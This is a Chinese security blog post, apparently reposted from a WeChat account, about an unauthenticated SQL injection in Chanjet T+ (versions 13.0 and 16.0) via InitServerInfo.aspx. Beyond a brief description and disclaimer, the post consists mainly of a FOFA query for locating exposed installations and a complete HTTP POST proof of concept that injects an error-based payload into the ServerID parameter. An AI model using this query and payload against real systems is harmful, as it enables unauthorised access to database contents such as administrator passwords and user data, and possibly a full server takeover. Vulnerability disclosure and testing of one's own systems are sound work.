【1day】畅捷通T+ InitServerInfo.aspx SQL

admin 2024年3月25日11:01:06评论31 views字数 1503阅读5分0秒阅读模式
PART.01
免责声明

安全圈子我最菜(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PART.02
漏洞描述

畅捷通T+的InitServerInfo.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

PART.03
fofa搜索语句

app="畅捷通-TPlus"

PART.04
影响版本

畅捷通T+ 13.0

畅捷通T+ 16.0

PART.05
漏洞复现

【1day】畅捷通T+ InitServerInfo.aspx SQL

POC:

POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1Host: Cookie: HOST=null; ASP.NET_SessionId=3ysypgqljcjlb3jh0e4pktq3; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1710379542; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1710379542Cache-Control: max-age=0Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://43.143.166.226/tplus/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 94operbtn=create&ServerID=%27%2b(select%0d%0a1%0d%0awhere%0d%0a1%0d%0ain%0d%0a(@@VERSION))%2b%27

本工具或文章来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!

原文始发于微信公众号(道一安全):【1day】畅捷通T+ InitServerInfo.aspx SQL

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月25日11:01:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【1day】畅捷通T+ InitServerInfo.aspx SQLhttps://cn-sec.com/archives/2600805.html

发表评论

匿名网友 填写信息